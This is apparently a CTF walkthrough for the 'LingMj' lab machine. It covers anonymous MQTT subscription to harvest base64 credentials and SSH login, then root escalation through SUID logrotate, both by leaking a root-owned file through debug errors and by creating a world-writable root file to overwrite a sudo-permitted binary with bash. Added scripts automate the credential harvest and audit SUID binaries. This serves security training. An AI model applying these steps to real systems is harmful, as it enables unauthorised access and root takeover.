Temp-Lingmj-Walkthrough
城南花已开

Information Gathering

Service Discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc.
192.168.60.161 08:00:27:49:53:be PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e0:e5:17 VMware, Inc.

9 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.122 seconds (120.64 hosts/sec). 4 responded
export ip=192.168.60.161
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
TreadStone was here 🚀

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.161:22
Open 192.168.60.161:80
Open 192.168.60.161:1883
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-27 13:48 CST
Initiating ARP Ping Scan at 13:48
Scanning 192.168.60.161 [1 port]
Completed ARP Ping Scan at 13:48, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:48
Completed Parallel DNS resolution of 1 host. at 13:48, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 13:48
Scanning 192.168.60.161 [3 ports]
Discovered open port 22/tcp on 192.168.60.161
Discovered open port 1883/tcp on 192.168.60.161
Discovered open port 80/tcp on 192.168.60.161
Completed SYN Stealth Scan at 13:48, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.60.161
Host is up, received arp-response (0.00042s latency).
Scanned at 2025-04-27 13:48:08 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
1883/tcp open mqtt syn-ack ttl 64
MAC Address: 08:00:27:49:53:BE (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

Port 1883 is open, which is MQTT.

Try connecting anonymously with the MQTTX client, with no username or password.


Add a subscription to the topic #, the wildcard that matches every topic on the broker.

A base64 string is published at regular intervals.


Decode it to get credentials for the welcome user:

echo "d2VsY29tZTpmOGM1N2RmYzU4MGVhODk0YTI1M2E2ZTE2ZjMwYWMyMQ=="|base64 -d
welcome:f8c57dfc580ea894a253a6e16f30ac21
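The same harvesting done from the command line with mosquitto_sub instead of the MQTTX GUI, as an added example that is not part of the original walkthrough. The topic names and the two non-credential messages in the sample feed are constructed; only the base64 credential payload is the one observed above. The live capture line is commented out so the script runs offline.

```shell
#!/bin/sh
# Added example: harvest credentials from an anonymous MQTT broker.
# Live use (needs mosquitto-clients and the target broker):
#   mosquitto_sub -h 192.168.60.161 -p 1883 -t '#' -v | decode_mqtt_creds
# -t '#' subscribes to every topic; -v prints "<topic> <payload>" per message.

# Read "<topic> <payload>" lines, try to base64-decode each payload and keep
# only the ones that decode to a printable "user:secret" pair. Anything that
# is not valid base64 (plain numbers, text with spaces) is silently dropped.
decode_mqtt_creds() {
    while IFS=' ' read -r topic payload; do
        [ -n "$payload" ] || continue
        # base64 -d exits non-zero on invalid input; skip those payloads
        decoded=$(printf '%s' "$payload" | base64 -d 2>/dev/null) || continue
        # require a printable "name:secret" shape, not arbitrary binary
        printf '%s' "$decoded" | LC_ALL=C grep -Eq '^[A-Za-z0-9._-]+:[[:graph:]]+$' || continue
        printf '%s %s\n' "$topic" "$decoded"
    done
}

# Constructed sample of what `mosquitto_sub -t '#' -v` might print on this box.
# Topic names and the noise messages are made up; the base64 payload is the
# one seen in the walkthrough.
sample_feed() {
    printf '%s\n' \
        '$SYS/broker/uptime 1234 seconds' \
        'sensors/temp 21.5' \
        'sensors/raw dGVzdA==' \
        'notify d2VsY29tZTpmOGM1N2RmYzU4MGVhODk0YTI1M2E2ZTE2ZjMwYWMyMQ=='
}

sample_feed | decode_mqtt_creds
```

The grep check is deliberately strict: a payload that happens to be valid base64 (dGVzdA== decodes to "test") but does not look like a credential pair is dropped rather than printed as garbage.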

User Shell

Connect over SSH:

❯ ssh welcome@$ip
welcome@192.168.60.161's password:
Linux LingMj 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Apr 26 20:25:47 2025 from 192.168.60.100
welcome@LingMj:~$ cat user.txt
flag{user-userflaghere}

sudo -l shows that welcome may run /usr/bin/ash as root without a password.

This is a trap, though: the binary only fakes a root shell. Running strings on it shows the canned responses (a hardcoded uid=0(root) line, a fake root.txt answer, a root@LingMj:~# prompt) and the source filename fake.c, so it is a small readline program with a fixed command list, not a shell.

welcome@LingMj:~$ sudo -l
Matching Defaults entries for welcome on LingMj:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on LingMj:
(ALL) NOPASSWD: /usr/bin/ash
welcome@LingMj:~$ strings /usr/bin/ash
/lib64/ld-linux-x86-64.so.2
mh OG
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
readline
rl_completion_matches
rl_attempted_completion_over
rl_attempted_completion_function
rl_outstream
using_history
add_history
strncmp
puts
putchar
strdup
strlen
stderr
__cxa_finalize
strcmp
__libc_start_main
free
libreadline.so.8
libc.so.6
GLIBC_2.2.5
u/UH
[]A\A]A^A_
whoami
uid=0(root) gid=0(root) groups=0(root)
root.txt
cat root.txt
root
This is the great ta0 privilege escalation!
root@LingMj:~#
;*3$"
GCC: (Debian 10.2.1-6) 10.2.1 20210110
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
fake.c
list_index.1
len.0
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
rl_outstream
free@GLIBC_2.2.5
putchar@GLIBC_2.2.5
strncmp@GLIBC_2.2.5
_ITM_deregisterTMCloneTable
puts@GLIBC_2.2.5
rl_attempted_completion_function
rl_completion_matches
add_history
_edata
strlen@GLIBC_2.2.5
readline
__libc_start_main@GLIBC_2.2.5
__data_start
strcmp@GLIBC_2.2.5
__gmon_start__
__dso_handle
_IO_stdin_used
custom_completion
command_list
using_history
__libc_csu_init
rl_attempted_completion_over
__bss_start
main
execute_command
__TMC_END__
_ITM_registerTMCloneTable
strdup@GLIBC_2.2.5
command_generator
__cxa_finalize@GLIBC_2.2.5
stderr@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
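A few checks to run before trusting a sudo-permitted "shell", as an added example that is not from the original write-up. It reimplements the useful part of strings(1) with tr so it works without binutils, and the dpkg ownership check only fires for paths under the system binary directories. The sample file built at the end is constructed from the literals seen in the strings output above; the function names and the set of indicator strings are my own choices.

```shell
#!/bin/sh
# Added example: sanity-check a binary that sudo lets us run before trusting
# its output. On LingMj, /usr/bin/ash is a readline toy that prints canned
# "root" output; these checks flag it.

# Print runs of 4+ printable characters, the way strings(1) does, without
# needing binutils installed.
extract_strings() {
    LC_ALL=C tr -c '[:print:]' '\n' < "$1" | grep -E '.{4,}'
}

# Return 0 if nothing looks wrong, 1 if any indicator fires (each printed).
audit_sudo_shell() {
    bin=$1
    rc=0

    # 1. A real shell in a system directory belongs to a package. A hand-built
    #    binary dropped into /usr/bin does not. (Only meaningful on dpkg systems.)
    case $bin in
        /bin/*|/sbin/*|/usr/*)
            if command -v dpkg >/dev/null 2>&1 && ! dpkg -S "$bin" >/dev/null 2>&1; then
                echo "not owned by any dpkg package: $bin"
                rc=1
            fi ;;
    esac

    # 2. A shell computes id(1) output at runtime; it never embeds it. Literal
    #    privileged-looking output or a root prompt is a strong fake indicator.
    for needle in 'uid=0(root)' 'root@' 'privilege escalation'; do
        if extract_strings "$bin" | grep -qF -- "$needle"; then
            echo "embedded literal '$needle' in $bin"
            rc=1
        fi
    done

    # 3. An unstripped build leaks its source filename (fake.c on this box).
    if extract_strings "$bin" | grep -qE '^[A-Za-z0-9_]+\.c$'; then
        echo "source filename left in symbol table of $bin"
        rc=1
    fi

    return $rc
}

# Constructed sample: a stand-in for the fake /usr/bin/ash, holding only the
# string literals seen in its strings(1) output, NUL-separated like real rodata.
make_fake_shell_sample() {
    f=$(mktemp)
    printf 'whoami\0uid=0(root) gid=0(root) groups=0(root)\0cat root.txt\0This is the great ta0 privilege escalation!\0root@LingMj:~#\0fake.c\0' > "$f"
    printf '%s\n' "$f"
}

sample=$(make_fake_shell_sample)
if audit_sudo_shell "$sample"; then
    echo "no indicators for $sample"
else
    echo "REFUSE to trust $sample as a shell"
fi
rm -f "$sample"
```

Run it against the real path (audit_sudo_shell /usr/bin/ash) on the box; the dpkg check alone is enough to show it is not the BusyBox or dash binary the name suggests.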

Look for suspicious SUID binaries

screen and logrotate both have the SUID bit set; neither carries it on a stock Debian system.

welcome@LingMj:~$ find / -perm -u=s -type f 2>/dev/null
/usr/sbin/logrotate
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/screen
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
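Comparing the SUID listing against a baseline instead of eyeballing it, as an added example that is not from the original write-up. The baseline is my assumption about what a default Debian 10 install ships SUID, built from the paths in the listing above minus the two outliers; the live find is commented out and the function is run on that listing as sample input.

```shell
#!/bin/sh
# Added example: flag SUID binaries that are not expected on a stock install.
# Live use:  find / -perm -4000 -type f 2>/dev/null | unexpected_suid

# Assumed baseline: SUID files a default Debian 10 (buster) install ships.
# Anything not in this list deserves a look.
debian_suid_baseline() {
    printf '%s\n' \
        /usr/bin/chsh /usr/bin/chfn /usr/bin/newgrp /usr/bin/gpasswd \
        /usr/bin/mount /usr/bin/umount /usr/bin/su /usr/bin/sudo \
        /usr/bin/passwd /usr/bin/pkexec \
        /usr/lib/dbus-1.0/dbus-daemon-launch-helper \
        /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign \
        /usr/libexec/polkit-agent-helper-1
}

# Read SUID paths on stdin, print those absent from the baseline, sorted.
# comm needs both inputs sorted the same way, hence LC_ALL=C throughout.
unexpected_suid() {
    base=$(mktemp)
    debian_suid_baseline | LC_ALL=C sort > "$base"
    LC_ALL=C sort | LC_ALL=C comm -23 - "$base"
    rm -f "$base"
}

# The listing from the walkthrough, as sample input.
lingmj_suid_listing() {
    printf '%s\n' \
        /usr/sbin/logrotate /usr/bin/chsh /usr/bin/chfn /usr/bin/newgrp \
        /usr/bin/screen /usr/bin/gpasswd /usr/bin/mount /usr/bin/su \
        /usr/bin/umount /usr/bin/pkexec /usr/bin/sudo /usr/bin/passwd \
        /usr/lib/dbus-1.0/dbus-daemon-launch-helper \
        /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign \
        /usr/libexec/polkit-agent-helper-1
}

lingmj_suid_listing | unexpected_suid
```

On a merged-/usr system, paths such as /bin/su and /usr/bin/su are the same file; normalise with readlink -f before comparing if your baseline was taken on a different layout.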

logrotate is designed to ease administration of systems that generate large numbers of log files. It allows automatic rotation, compression, removal and mailing of log files. Each log file may be handled daily, weekly, monthly, or when it grows too large.

screen is a terminal multiplexer for managing multiple virtual terminal sessions inside a single terminal window. It is particularly suited to running long tasks on remote servers, or keeping processes alive after an SSH connection drops.

Check the screen version:

welcome@LingMj:/tmp$ screen -version
Screen version 4.09.00 (GNU) 30-Jan-22

GNU screen v4.9.0 - Privilege Escalation - Linux local Exploit

I thought the version matched the exploit's requirements exactly, but the attempt went nowhere.

Changing direction: logrotate has publicly documented exploits based on a race condition:

Linux Privilege Escalation - HackTricks

Details of the logrotate race condition | 汇源科技

whotwagner/logrotten

I tried it, but it did not work.


Method 1

However, I found that logrotate can read files, though only a little of the beginning: in debug mode (-d) it parses the given path as a configuration file and echoes the first unrecognised token back in its error message, running as root because of the SUID bit.

There is a backup file under /var/backups owned by root.

Reading it this way leaks its content: naughtykid

welcome@LingMj:~$ /usr/sbin/logrotate -d /var/backups/root.bak
WARNING: logrotate in debug mode does nothing except printing debug messages! Consider using verbose mode (-v) instead if this is not what you want.

reading config file /var/backups/root.bak
error: /var/backups/root.bak:1 unknown option 'naughtykid' -- ignoring line
Reading state from file: /var/lib/logrotate/status
Allocating hash table for state file, size 64 entries

Try it as the root password:

welcome@LingMj:~$ su root
Password:
root@LingMj:/home/welcome# id
uid=0(root) gid=0(root) groups=0(root)
root@LingMj:/home/welcome# cat /root/root.txt
flag{root-rootflagalsohere}

Method 2

Because logrotate here is SUID root and accepts an arbitrary configuration file, its create directive can be abused to create files owned by root with any permissions you choose.

welcome@LingMj:/tmp$ echo "This is a test log line" > /tmp/111.log
welcome@LingMj:/tmp$ for i in {1..1000}; do echo "Log entry $i" >> /tmp/111.log; done
welcome@LingMj:/tmp$ cat logrotate.conf
/tmp/111.log {
size 1k
rotate 2
create 0777 root root
missingok
notifempty
}

After running it, the newly created 111.log is owned by root with mode 777:

welcome@LingMj:/tmp$ /usr/sbin/logrotate -f logrotate.conf
welcome@LingMj:/tmp$ ls -al
total 60
drwxrwxrwt 10 root root 4096 Apr 27 06:19 .
drwxr-xr-x 18 root root 4096 Mar 18 20:37 ..
-rwxrwxrwx 1 root root 0 Apr 27 06:19 111.log
-rw-r--r-- 1 welcome welcome 13917 Apr 27 06:19 111.log.1

So we can point the configuration at /usr/bin/ash: rotation moves the fake binary to /usr/bin/ash.1 and recreates /usr/bin/ash as an empty, world-writable file owned by root.

Then write the real /bin/bash into /usr/bin/ash and run it through the existing sudo rule.

Modify the configuration file:

welcome@LingMj:/tmp$ vi logrotate.conf
/usr/bin/ash {
size 1k
rotate 2
create 0777 root root
missingok
notifempty
}
welcome@LingMj:/tmp$ /usr/sbin/logrotate -f logrotate.conf
welcome@LingMj:/tmp$ ls -al /usr/bin/ash*
-rwxrwxrwx 1 root root 0 Apr 27 06:23 /usr/bin/ash
-rwxr-xr-x 1 root root 17592 Apr 26 00:28 /usr/bin/ash.1
welcome@LingMj:/tmp$ cat /bin/bash > /usr/bin/ash
welcome@LingMj:/tmp$ ls -al /usr/bin/ash
-rwxrwxrwx 1 root root 1168776 Apr 27 06:24 /usr/bin/ash
welcome@LingMj:/tmp$ sudo /usr/bin/ash
root@LingMj:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@LingMj:/tmp# cat /root/root.txt
flag{root-rootflagalsohere}